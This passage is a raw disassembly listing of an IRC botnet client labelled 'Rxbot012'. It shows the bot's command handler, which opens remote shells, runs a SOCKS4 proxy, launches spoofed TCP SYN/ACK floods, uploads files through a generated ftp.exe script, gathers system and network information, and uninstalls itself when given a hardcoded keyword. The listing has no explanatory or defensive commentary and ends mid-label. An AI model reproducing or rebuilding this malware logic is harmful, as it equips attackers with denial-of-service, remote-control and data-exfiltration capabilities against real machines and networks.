push offset aCmdRemoteShell ; "[CMD]: Remote shell already running."
jmp loc_40DA79
; ---------------------------------------------------------------------------
loc_40E486: ; CODE XREF: sub_409806+4C74�j
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4106AD
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_40E4A5
push offset aCmdCouldnTOpen ; "[CMD]: Couldn't open remote shell."
jmp loc_40DA79
; ---------------------------------------------------------------------------
loc_40E4A5: ; CODE XREF: sub_409806+4C93�j
push offset aCmdRemoteShe_0 ; "[CMD]: Remote shell ready."
jmp loc_40DA79
; ---------------------------------------------------------------------------
loc_40E4AF: ; CODE XREF: sub_409806+135A�j
; sub_409806+136E�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_406E62
jmp loc_40E78A
; ---------------------------------------------------------------------------
loc_40E4C8: ; CODE XREF: sub_409806+1332�j
; sub_409806+1346�j
push [ebp+ebx+var_A0]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_403440
jmp loc_40E78A
; ---------------------------------------------------------------------------
loc_40E4E5: ; CODE XREF: sub_409806+130A�j
; sub_409806+131E�j
or esi, 0FFFFFFFFh
call dword_42201C ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
mov edi, eax
jz short loc_40E50D
push ebx
call sub_416C92
pop ecx
mov esi, eax
loc_40E50D: ; CODE XREF: sub_409806+4CFC�j
xor edx, edx
mov eax, edi
mov ecx, 15180h
div ecx
cmp eax, esi
jnb short loc_40E525
cmp esi, 0FFFFFFFFh
jnz loc_40F8C3
loc_40E525: ; CODE XREF: sub_409806+4D14�j
push 0
call sub_41296D
push eax
lea eax, [ebp+var_2F0]
push offset aMainUptimeS_ ; "[MAIN]: Uptime: %s."
push eax
call sub_416905
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
loc_40E564: ; CODE XREF: sub_409806+27D3�j
add esp, 28h
jmp loc_40F8C3
; ---------------------------------------------------------------------------
loc_40E56C: ; CODE XREF: sub_409806+12E2�j
; sub_409806+12F6�j
push 1Fh
call sub_4138A6
test eax, eax
pop ecx
jle short loc_40E5A2
cmp [ebp+var_C], 0
jnz loc_409A84
push 0
push [ebp+var_4]
push offset aProcAlreadyRun ; "[PROC]: Already running."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40E5A2: ; CODE XREF: sub_409806+4D70�j
push [ebp+var_9C]
lea eax, [ebp+var_384]
push 80h
push eax
call sub_416B5D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A0]
and [ebp+var_300], 0
mov [ebp+var_388], eax
mov eax, [ebp+var_4]
mov [ebp+var_2FC], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_2F8], eax
jz short loc_40E603
push 5
mov edi, ebx
mov esi, offset aFull ; "full"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40E603
mov [ebp+var_300], 1
loc_40E603: ; CODE XREF: sub_409806+4DE1�j
; sub_409806+4DF1�j
lea eax, [ebp+var_2F0]
push offset aProcsProccessL ; "[PROCS]: Proccess list."
push eax
call sub_416905
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Fh
push eax
call sub_4136B6
add esp, 14h
mov [ebp+var_304], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_388]
push eax
push offset sub_40901A
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_304]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40E685
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aProcsFailedToS ; "[PROCS]: Failed to start listing thread"...
push eax
call sub_416905
add esp, 0Ch
jmp loc_40D1AD
; ---------------------------------------------------------------------------
loc_40E67D: ; CODE XREF: sub_409806+4E85�j
push 32h
call dword_422000 ; Sleep
loc_40E685: ; CODE XREF: sub_409806+4E55�j
cmp [ebp+var_2F4], esi
jz short loc_40E67D
jmp loc_40D1AD
; ---------------------------------------------------------------------------
loc_40E692: ; CODE XREF: sub_409806+12BA�j
; sub_409806+12CE�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz loc_409A84
mov esi, ebx
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40E6A8: ; CODE XREF: sub_409806+4EBE�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40E6CA
test cl, cl
jz short loc_40E6C6
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40E6CA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40E6A8
loc_40E6C6: ; CODE XREF: sub_409806+4EAC�j
xor eax, eax
jmp short loc_40E6CF
; ---------------------------------------------------------------------------
loc_40E6CA: ; CODE XREF: sub_409806+4EA8�j
; sub_409806+4EB6�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40E6CF: ; CODE XREF: sub_409806+4EC2�j
test eax, eax
jnz loc_409A84
cmp [ebp+var_C], eax
jnz short loc_40E6F6
push eax
push [ebp+var_4]
push offset aMainRemovingBo ; "[MAIN]: Removing Bot."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
loc_40E6F6: ; CODE XREF: sub_409806+4ED4�j
push [ebp+arg_4]
call dword_43A4B0 ; closesocket
call dword_43A4BC ; WSACleanup
call sub_407534
jmp loc_40EE36
; ---------------------------------------------------------------------------
loc_40E70F: ; CODE XREF: sub_409806+1292�j
; sub_409806+12A6�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push eax
call sub_412AEE
pop ecx
pop ecx
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
push offset aMainSystemInfo ; "[MAIN]: System Info."
jmp short loc_40E769
; ---------------------------------------------------------------------------
loc_40E73B: ; CODE XREF: sub_409806+126A�j
; sub_409806+127E�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_412D55
add esp, 0Ch
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
push offset aMainNetworkInf ; "[MAIN]: Network Info."
loc_40E769: ; CODE XREF: sub_409806+4C65�j
; sub_409806+4F33�j
call sub_401ECD
loc_40E76E: ; CODE XREF: sub_409806+36BD�j
add esp, 18h
jmp loc_40F8C3
; ---------------------------------------------------------------------------
loc_40E776: ; CODE XREF: sub_409806+1242�j
; sub_409806+1256�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401F6D
loc_40E78A: ; CODE XREF: sub_409806+1DF�j
; sub_409806+4CBD�j ...
add esp, 10h
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40E792: ; CODE XREF: sub_409806+121A�j
; sub_409806+122E�j
and [ebp+var_7D8], 0
cmp [ebp+var_14], 0
jz short loc_40E7D3
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40E7D3
push ebx
push [ebp+var_14]
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz short loc_40E7D3
push eax
push offset aS_3 ; "%s"
lea eax, [ebp+var_7D8]
push 80h
push eax
call sub_416B5D
add esp, 10h
loc_40E7D3: ; CODE XREF: sub_409806+4F97�j
; sub_409806+4FA2�j ...
push [ebp+var_9C]
lea eax, [ebp+var_858]
push 80h
push eax
call sub_416B5D
mov eax, [ebp+arg_4]
mov [ebp+var_85C], eax
mov eax, [ebp+var_4]
mov [ebp+var_754], eax
mov eax, [ebp+var_C]
mov [ebp+var_750], eax
lea eax, [ebp+var_2F0]
push offset aLogListingLog_ ; "[LOG]: Listing log."
push eax
call sub_416905
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Dh
push eax
call sub_4136B6
add esp, 20h
mov [ebp+var_758], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_85C]
push eax
push offset sub_401FDF
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_758]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40E878
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aLogFailedToSta ; "[LOG]: Failed to start listing thread, "...
jmp loc_40FA7C
; ---------------------------------------------------------------------------
loc_40E870: ; CODE XREF: sub_409806+5078�j
push 32h
call dword_422000 ; Sleep
loc_40E878: ; CODE XREF: sub_409806+5057�j
cmp [ebp+var_74C], esi
jz short loc_40E870
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40E885: ; CODE XREF: sub_409806+11F2�j
; sub_409806+1206�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401E55
push offset aMainAliasList_ ; "[MAIN]: Alias list."
call sub_401ECD
loc_40E8A0: ; CODE XREF: sub_409806+4BC6�j
add esp, 10h
jmp loc_40F8C3
; ---------------------------------------------------------------------------
loc_40E8A8: ; CODE XREF: sub_409806+11CA�j
; sub_409806+11DE�j
push [ebp+var_9C]
lea eax, [ebp+var_484]
push 80h
push eax
call sub_416B5D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A0]
mov [ebp+var_488], eax
mov eax, [ebp+var_4]
mov [ebp+var_3FC], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_3F8], eax
jz short loc_40E901
push 4
xor eax, eax
mov edi, offset aSub ; "sub"
mov esi, ebx
pop ecx
repe cmpsb
setz al
mov [ebp+var_400], eax
jmp short loc_40E908
; ---------------------------------------------------------------------------
loc_40E901: ; CODE XREF: sub_409806+50E0�j
and [ebp+var_400], 0
loc_40E908: ; CODE XREF: sub_409806+50F9�j
lea eax, [ebp+var_2F0]
push offset aThreadsListThr ; "[THREADS]: List threads."
push eax
call sub_416905
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 20h
push eax
call sub_4136B6
add esp, 14h
mov [ebp+var_404], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_488]
push eax
push offset sub_4139B7
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_404]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40E97B
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aThreadsFaile_0 ; "[THREADS]: Failed to start list thread,"...
jmp loc_40D70B
; ---------------------------------------------------------------------------
loc_40E973: ; CODE XREF: sub_409806+517B�j
push 32h
call dword_422000 ; Sleep
loc_40E97B: ; CODE XREF: sub_409806+515A�j
cmp [ebp+var_3F4], esi
jz short loc_40E973
jmp loc_40AEF2
; ---------------------------------------------------------------------------
loc_40E988: ; CODE XREF: sub_409806+1150�j
; sub_409806+1164�j
push offset aRxbot012 ; "Rxbot012"
lea eax, [ebp+var_2F0]
push offset aMainBotIdS_ ; "[MAIN]: Bot ID: %s."
push eax
call sub_416905
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 20h
jmp loc_40AEF2
; ---------------------------------------------------------------------------
loc_40E9C0: ; CODE XREF: sub_409806+1128�j
; sub_409806+113C�j
push dword_480AB8
call sub_41296D
push eax
lea eax, [ebp+var_2F0]
push offset aMainStatusRead ; "[MAIN]: Status: Ready. Bot Uptime: %s."
push eax
call sub_416905
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 24h
jmp loc_40AEF2
; ---------------------------------------------------------------------------
loc_40E9FF: ; CODE XREF: sub_409806+1100�j
; sub_409806+1114�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40EA32
cmp [ebp+var_14], 0
jz short loc_40EA41
push ebx
push [ebp+var_14]
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz short loc_40EA41
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_405CD5
add esp, 0Ch
jmp short loc_40EA41
; ---------------------------------------------------------------------------
loc_40EA32: ; CODE XREF: sub_409806+5202�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_405CD5
pop ecx
pop ecx
loc_40EA41: ; CODE XREF: sub_409806+5208�j
; sub_409806+5217�j ...
push 0FFFFFFFEh
pop eax
jmp loc_409A87
; ---------------------------------------------------------------------------
loc_40EA49: ; CODE XREF: sub_409806+10D8�j
; sub_409806+10EC�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_405CD5
push offset aMainDisconnect ; "[MAIN]: Disconnecting."
call sub_401ECD
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_409A87
; ---------------------------------------------------------------------------
loc_40EA6B: ; CODE XREF: sub_409806+10B0�j
; sub_409806+10C4�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_405CD5
push offset aMainReconnecti ; "[MAIN]: Reconnecting."
call sub_401ECD
add esp, 0Ch
xor eax, eax
jmp loc_409A87
; ---------------------------------------------------------------------------
loc_40EA8C: ; CODE XREF: sub_409806+1088�j
; sub_409806+109C�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call start
loc_40EA9D: ; CODE XREF: sub_409806+3624�j
add esp, 0Ch
jmp loc_40F8C3
; ---------------------------------------------------------------------------
loc_40EAA5: ; CODE XREF: sub_409806+FE8�j
; sub_409806+FFC�j
push [ebp+ebx+var_A0]
push 1Fh
push offset aProcessList ; "Process list"
push offset aProc ; "[PROC]"
jmp short loc_40EACD
; ---------------------------------------------------------------------------
loc_40EABA: ; CODE XREF: sub_409806+FC0�j
; sub_409806+FD4�j
push [ebp+ebx+var_A0]
push 1Ch
push offset aFindFile ; "Find file"
push offset aFindfile_0 ; "[FINDFILE]"
loc_40EACD: ; CODE XREF: sub_409806+E45�j
; sub_409806+E6D�j ...
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4138EC
add esp, 20h
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40EAE9: ; CODE XREF: sub_409806+E08�j
; sub_409806+E1C�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40EB08
push esi
call sub_416C92
test eax, eax
pop ecx
jz short loc_40EB08
push esi
call sub_416C92
pop ecx
jmp short loc_40EB0D
; ---------------------------------------------------------------------------
loc_40EB08: ; CODE XREF: sub_409806+52EC�j
; sub_409806+52F7�j
mov eax, dword_42FCB8
loc_40EB0D: ; CODE XREF: sub_409806+5300�j
mov ebx, [ebp+ebx+var_9C]
xor edi, edi
cmp ebx, edi
mov [ebp+var_40C], eax
jz short loc_40EB34
push ebx
loc_40EB21: ; CODE XREF: sub_409806+533E�j
lea eax, [ebp+var_41C]
push 10h
push eax
call sub_416B5D
add esp, 0Ch
jmp short loc_40EB4D
; ---------------------------------------------------------------------------
loc_40EB34: ; CODE XREF: sub_409806+5318�j
cmp [ebp+var_38F], 0
jz short loc_40EB46
lea eax, [ebp+var_F0]
push eax
jmp short loc_40EB21
; ---------------------------------------------------------------------------
loc_40EB46: ; CODE XREF: sub_409806+5335�j
and [ebp+var_41C], 0
loc_40EB4D: ; CODE XREF: sub_409806+532C�j
mov eax, [ebp+var_4]
push [ebp+var_9C]
mov esi, [ebp+arg_4]
mov [ebp+var_400], eax
mov eax, [ebp+var_C]
mov [ebp+var_3FC], eax
lea eax, [ebp+var_49C]
push 80h
push eax
mov [ebp+var_4A0], esi
call sub_416B5D
add esp, 0Ch
push [ebp+var_40C]
push esi
call sub_408852
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_416905
push edi
lea eax, [ebp+var_2F0]
push 12h
push eax
call sub_4136B6
add esp, 1Ch
mov [ebp+var_408], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_4A0]
push eax
push offset sub_412412
push edi
push edi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_408]
imul ecx, 234h
cmp eax, edi
mov dword_43B254[ecx], eax
jnz short loc_40EC01
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aSocks4FailedTo ; "[SOCKS4]: Failed to start server thread"...
jmp loc_40FA7C
; ---------------------------------------------------------------------------
loc_40EBF9: ; CODE XREF: sub_409806+5401�j
push 32h
call dword_422000 ; Sleep
loc_40EC01: ; CODE XREF: sub_409806+53E0�j
cmp [ebp+var_3F8], edi
jz short loc_40EBF9
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40EC0E: ; CODE XREF: sub_409806+DB8�j
; sub_409806+DCC�j ...
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40EC36
mov edi, eax
push 4
mov esi, offset aSec ; "sec"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40EC36
and [ebp+var_300], eax
jmp short loc_40EC40
; ---------------------------------------------------------------------------
loc_40EC36: ; CODE XREF: sub_409806+5416�j
; sub_409806+5426�j
mov [ebp+var_300], 1
loc_40EC40: ; CODE XREF: sub_409806+542E�j
push [ebp+var_9C]
lea eax, [ebp+var_384]
push 80h
push eax
call sub_416B5D
mov eax, [ebp+arg_4]
mov [ebp+var_388], eax
mov eax, [ebp+var_4]
mov [ebp+var_2FC], eax
mov eax, [ebp+var_C]
xor esi, esi
add esp, 0Ch
cmp [ebp+var_300], esi
mov [ebp+var_2F8], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40EC89
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40EC89: ; CODE XREF: sub_409806+547C�j
push eax
push offset aSecureSSystem_ ; "[SECURE]: %s system."
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416B5D
push esi
lea eax, [ebp+var_2F0]
push 1Ah
push eax
call sub_4136B6
add esp, 1Ch
mov [ebp+var_304], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_388]
push eax
push offset sub_41190B
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_304]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40ED00
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
jmp loc_40C9D8
; ---------------------------------------------------------------------------
loc_40ECF8: ; CODE XREF: sub_409806+5500�j
push 32h
call dword_422000 ; Sleep
loc_40ED00: ; CODE XREF: sub_409806+54DF�j
cmp [ebp+var_2F4], esi
jz short loc_40ECF8
jmp loc_40EE11
; ---------------------------------------------------------------------------
loc_40ED0D: ; CODE XREF: sub_409806+D90�j
; sub_409806+DA4�j
push offset aBot0_012 ; "[Bot 0.012]"
push offset aMainS ; "[MAIN]: %s"
loc_40ED17: ; CODE XREF: sub_409806+3D62�j
lea eax, [ebp+var_2F0]
push eax
call sub_416905
loc_40ED23: ; CODE XREF: sub_409806+4C1A�j
add esp, 0Ch
jmp loc_40B921
; ---------------------------------------------------------------------------
loc_40ED2B: ; CODE XREF: sub_409806+D68�j
; sub_409806+D7C�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40ED83
push ebx
call sub_416C92
test eax, eax
pop ecx
jl short loc_40ED7B
cmp eax, 2
jge short loc_40ED7B
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp byte ptr [esi], 0
jz short loc_40ED73
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_416905
add esp, 0Ch
and byte ptr [esi], 0
jmp short loc_40EDEE
; ---------------------------------------------------------------------------
loc_40ED73: ; CODE XREF: sub_409806+554E�j
push eax
push offset aMainNoUserLogg ; "[MAIN]: No user logged in at slot: %d."
jmp short loc_40EDDF
; ---------------------------------------------------------------------------
loc_40ED7B: ; CODE XREF: sub_409806+5539�j
; sub_409806+553E�j
push eax
push offset aMainInvalidLog ; "[MAIN]: Invalid login slot number: %d."
jmp short loc_40EDDF
; ---------------------------------------------------------------------------
loc_40ED83: ; CODE XREF: sub_409806+552E�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_40ED88: ; CODE XREF: sub_409806+55BF�j
mov esi, [ebp+var_A4]
mov eax, edx
loc_40ED90: ; CODE XREF: sub_409806+55A6�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40EDB2
test cl, cl
jz short loc_40EDAE
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40EDB2
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40ED90
loc_40EDAE: ; CODE XREF: sub_409806+5594�j
xor eax, eax
jmp short loc_40EDB7
; ---------------------------------------------------------------------------
loc_40EDB2: ; CODE XREF: sub_409806+5590�j
; sub_409806+559E�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40EDB7: ; CODE XREF: sub_409806+55AA�j
test eax, eax
jz short loc_40EDC9
inc edi
add edx, 80h
cmp edi, 2
jl short loc_40ED88
jmp short loc_40EDEE
; ---------------------------------------------------------------------------
loc_40EDC9: ; CODE XREF: sub_409806+55B3�j
mov eax, [ebp+arg_18]
shl edi, 7
and byte ptr [edi+eax], 0
lea eax, [ebp+var_F0]
push eax
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
loc_40EDDF: ; CODE XREF: sub_409806+1CBB�j
; sub_409806+1CE9�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_416905
add esp, 0Ch
loc_40EDEE: ; CODE XREF: sub_409806+1C93�j
; sub_409806+1CAA�j ...
cmp [ebp+var_C], 0
jnz short loc_40EE11
push 0
loc_40EDF6: ; CODE XREF: sub_409806+59EA�j
; sub_409806+5DD0�j
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
loc_40EE09: ; CODE XREF: sub_409806+2C4C�j
; sub_409806+2E5C�j ...
call sub_405D20
add esp, 14h
loc_40EE11: ; CODE XREF: sub_409806+11B7�j
; sub_409806+2C36�j ...
xor esi, esi
inc esi
jmp loc_40AEF5
; ---------------------------------------------------------------------------
loc_40EE19: ; CODE XREF: sub_409806+D40�j
; sub_409806+D54�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E8
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AC59
call sub_413827
loc_40EE36: ; CODE XREF: sub_409806+4F04�j
push 0
call dword_422040 ; ExitProcess
loc_40EE3E: ; CODE XREF: sub_409806+153B�j
push 8
mov edi, eax
mov esi, offset aHttpcon ; "httpcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EFF5
push 5
mov edi, eax
mov esi, offset aHcon ; "hcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40EFF5
cmp [ebp+ebx+var_90], edx
jz loc_409A84
mov edi, eax
push 7
mov esi, offset aUpload ; "upload"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40F8C3
mov edi, [ebp+ebx+var_90]
push 4
push edi
call sub_403148
test eax, eax
pop ecx
pop ecx
jnz short loc_40EEB6
push edi
push offset aFtpFileNotFoun ; "[FTP]: File not found: %s."
loc_40EEA2: ; CODE XREF: sub_409806+4269�j
lea eax, [ebp+var_2F0]
push eax
call sub_416905
add esp, 0Ch
jmp loc_40D18A
; ---------------------------------------------------------------------------
loc_40EEB6: ; CODE XREF: sub_409806+5694�j
call dword_42201C ; GetTickCount
push eax
call sub_41698D
pop ecx
call sub_41699A
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_41699A
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_41699A
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_1DF0]
push edx
push eax
lea eax, [ebp+var_154C]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_416905
lea eax, [ebp+var_154C]
push offset aAb ; "ab"
push eax
call sub_41719C
add esp, 20h
test eax, eax
mov [ebp+var_1C], eax
jz loc_409A84
mov esi, [ebp+ebx+var_A0]
push edi
push [ebp+arg_0]
push [ebp+ebx+var_98]
push [ebp+ebx+var_9C]
push esi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_417834
push [ebp+var_1C]
call sub_416E0D
lea eax, [ebp+var_154C]
push eax
lea eax, [ebp+var_848]
push offset aSS_4 ; "-s:%s"
push eax
call sub_416905
add esp, 2Ch
xor eax, eax
push eax
push eax
lea ecx, [ebp+var_848]
push ecx
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push eax
call dword_43A4AC ; ShellExecuteA
test eax, eax
push esi
push edi
jz short loc_40EF91
push offset aFtpUploadingFi ; "[FTP]: Uploading file: %s to: %s"
jmp short loc_40EF96
; ---------------------------------------------------------------------------
loc_40EF91: ; CODE XREF: sub_409806+5782�j
push offset aFtpUploading_0 ; "[FTP]: Uploading file: %s to: %s failed"...
loc_40EF96: ; CODE XREF: sub_409806+5789�j
call sub_416905
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40EFC1
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
loc_40EFC1: ; CODE XREF: sub_409806+579C�j
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
jmp short loc_40EFDB
; ---------------------------------------------------------------------------
loc_40EFCF: ; CODE XREF: sub_409806+57E8�j
lea eax, [ebp+var_154C]
push eax
call sub_418005
loc_40EFDB: ; CODE XREF: sub_409806+57C7�j
lea eax, [ebp+var_154C]
push 4
push eax
call sub_403148
add esp, 0Ch
test eax, eax
jnz short loc_40EFCF
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40EFF5: ; CODE XREF: sub_409806+5646�j
; sub_409806+565A�j
push [ebp+ebx+var_90]
push [ebp+arg_0]
push [ebp+ebx+var_98]
push [ebp+ebx+var_9C]
call sub_416C92
pop ecx
push eax
push [ebp+ebx+var_A0]
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_404FFA
jmp loc_40F8C0
; ---------------------------------------------------------------------------
loc_40F034: ; CODE XREF: sub_409806+1513�j
; sub_409806+1527�j
push [ebp+ebx+var_A0]
lea eax, [ebp+var_1120]
push 80h
push eax
call sub_416B5D
add esp, 0Ch
push 4
lea edi, [ebp+var_1120]
mov esi, offset aSyn ; "syn"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40F095
push 4
lea edi, [ebp+var_1120]
mov esi, offset aAck ; "ack"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40F095
push 7
lea edi, [ebp+var_1120]
mov esi, offset aRandom_0 ; "random"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40F095
push offset aTcpInvalidFloo ; "[TCP]: Invalid flood type specified."
jmp loc_40F1D6
; ---------------------------------------------------------------------------
loc_40F095: ; CODE XREF: sub_409806+585B�j
; sub_409806+586F�j ...
push [ebp+arg_0]
call sub_416C92
test eax, eax
pop ecx
mov [ebp+var_1018], eax
jle loc_40F1D1
mov eax, [ebp+ebx+var_A0]
push eax
mov [ebp+var_8], eax
mov esi, 80h
lea eax, [ebp+var_1120]
push esi
push eax
call sub_416B5D
mov edi, [ebp+ebx+var_9C]
push edi
lea eax, [ebp+var_11A0]
push esi
push eax
call sub_416B5D
mov ebx, [ebp+ebx+var_98]
push ebx
call sub_416C92
push [ebp+var_9C]
mov [ebp+var_101C], eax
xor eax, eax
cmp byte ptr [ebp+var_380+2], al
push esi
setnz al
mov [ebp+var_1014], eax
mov eax, [ebp+arg_4]
mov [ebp+var_11A4], eax
lea eax, [ebp+var_10A0]
push eax
call sub_416B5D
mov eax, [ebp+var_4]
mov [ebp+var_1010], eax
mov eax, [ebp+var_C]
add esp, 28h
cmp [ebp+var_1014], 0
mov [ebp+var_100C], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40F146
mov eax, offset aNormal ; "Normal"
loc_40F146: ; CODE XREF: sub_409806+5939�j
push [ebp+arg_0]
push ebx
push edi
push [ebp+var_8]
push eax
push offset aTcpSSFloodingS ; "[TCP]: %s %s flooding: (%s:%s) for %s s"...
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416B5D
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Dh
push eax
call sub_4136B6
add esp, 2Ch
mov [ebp+var_1020], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_11A4]
push eax
push offset sub_412E0B
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_1020]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40F1C7
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aTcpFailedToSta ; "[TCP]: Failed to start flood thread, er"...
jmp loc_40F84D
; ---------------------------------------------------------------------------
loc_40F1BF: ; CODE XREF: sub_409806+59C7�j
push 32h
call dword_422000 ; Sleep
loc_40F1C7: ; CODE XREF: sub_409806+59A6�j
cmp [ebp+var_1008], esi
jz short loc_40F1BF
jmp short loc_40F1E6
; ---------------------------------------------------------------------------
loc_40F1D1: ; CODE XREF: sub_409806+58A0�j
